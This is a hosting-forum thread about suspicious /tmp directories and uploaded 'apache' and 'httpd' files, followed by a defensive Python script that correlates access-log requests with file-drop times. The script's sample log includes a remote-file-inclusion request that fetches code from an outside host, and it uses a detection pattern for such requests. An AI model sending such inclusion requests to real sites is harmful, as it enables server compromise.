Full Version: .iroha_unix and .ICE-unix
The Planet Forums > Security > General Security > UNIX Security
Bork
I've read through the following two articles and aside from disabling my compilers, I basically follow most of what they've written to the letter:
Improving System Security On CPanel Systems
How To: Secure your new RedHat Server

I've also installed Blue|Fusion's Linux Security Script and haven't had much in the way of problems on our servers in a while. I am curious about two things though. I'm pretty sure that there's a script somewhere on the server that's allowing someone to upload their apps onto /tmp (thankfully, noexec) but I've been unable to find it by checking for the offending files in the httpd logs of the various sites on the server. Any hints as to what I should be looking for?

I've also noticed that for some reason, the attacker always creates directories for ".iroha_unix" and ".ICE-unix" in /tmp so I was wondering how is this possible if /tmp is already set to noexec?

Also found the following when I ran netstat -dl:
CODE
unix  2      [ ACC ]     STREAM     LISTENING     14252  /tmp/.iroha_unix/IROHA
unix  2      [ ACC ]     STREAM     LISTENING     18413  /tmp/.font-unix/fs7100

Any suggestions on where I could read more about solving these issues?
Blue|Fusion
Hi Bork,

/tmp/.ICE-unix and /tmp/.iroha_unix are supposed to be there. I don't know off hand what they're for, but every system I've used (even local desktops) had those directories. These are not hack attempts and should be left alone.

All programs should be able to write to /tmp (hence permissions are 1777); however, with the "noexec" option, uploaded scripts are prevented from being executed in /tmp.
Bork
Thanks for the info Blue|Fusion. Just that I noticed that whenever the system would slow down (load jumping up to 50), I'd find those two folders there. My Google search results for iroha and ICE led me to a bunch of Japanese sites, so I'm guessing they're used for the Canna server or something?

Any suggestions with regard to tracking down which script is allowing uploads of potentially malicious code? I usually see a bunch of files named "apache" and "httpd" in /tmp. (which they thankfully can't execute :) )
Blue|Fusion
Files named apache and httpd should not be in /tmp, at least from what I've seen (mostly with cPanel servers). Those two folders could be from the canna server. I never really looked into it. If you don't need the cannaserver, stop the service and try it out.
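Bork's original question was how to find the script that lets the "apache" and "httpd" files into /tmp when the file names never show up in the httpd logs. The trick is to search the access logs by time rather than by file name: the request that planted the file is a POST to the vulnerable script (or a GET whose query string carries a URL) logged within a minute or two of the dropped file's timestamp. The following is an added example written for this thread, not code from either poster or from the linked scripts; the log lines, IPs, script paths and the dropped-file time are constructed, and the "URL in the query string" check is an assumption about what an upload request may look like.

```python
"""Correlate the time a file appeared in /tmp with requests in an Apache access log."""
import os
import re
from datetime import datetime, timedelta, timezone

# Combined/common log format: ip ident user [timestamp] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

def parse_ts(ts: str) -> datetime:
    """Parse an Apache timestamp such as 10/Oct/2006:13:55:36 -0700."""
    return datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")

def file_dropped_at(path: str) -> datetime:
    """When a real dropped file (e.g. /tmp/httpd) was created on this box (ctime)."""
    return datetime.fromtimestamp(os.stat(path).st_ctime, tz=timezone.utc)

def candidate_uploaders(log_lines, dropped_at: datetime, window_seconds: int = 120) -> dict:
    """Return {script_path: hit_count} for requests that could have written the file:
    any POST, or a GET whose query string carries a URL, within +/- window_seconds
    of the time the file appeared in /tmp."""
    window = timedelta(seconds=window_seconds)
    hits = {}
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in CLF/combined format
        if abs(parse_ts(m.group("ts")) - dropped_at) > window:
            continue
        path = m.group("path")
        if m.group("method") == "POST" or "=http" in path.lower():
            script = path.split("?", 1)[0]  # drop the query string, keep the script
            hits[script] = hits.get(script, 0) + 1
    return hits

# Constructed sample log (not real traffic) and a constructed ctime for /tmp/httpd.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2006:13:50:01 -0700] "GET /index.php HTTP/1.1" 200 5120
203.0.113.5 - - [10/Oct/2006:13:55:30 -0700] "POST /gallery/upload.php HTTP/1.1" 200 312
203.0.113.5 - - [10/Oct/2006:13:55:36 -0700] "GET /forum/view.php?page=http://198.51.100.7/x.txt HTTP/1.1" 200 88
198.51.100.20 - - [10/Oct/2006:14:30:12 -0700] "POST /contact.php HTTP/1.1" 200 1044
""".splitlines()
DROPPED_AT = parse_ts("10/Oct/2006:13:55:40 -0700")

if __name__ == "__main__":
    # On a real server: file_dropped_at("/tmp/httpd") and open("/usr/local/apache/logs/access_log")
    for script, n in sorted(candidate_uploaders(SAMPLE_LOG, DROPPED_AT).items()):
        print(f"{n:3d}  {script}")
```

On a cPanel box the per-site logs live in separate files, so run the function over each domain's access log and inspect whichever script keeps showing up right before the files appear.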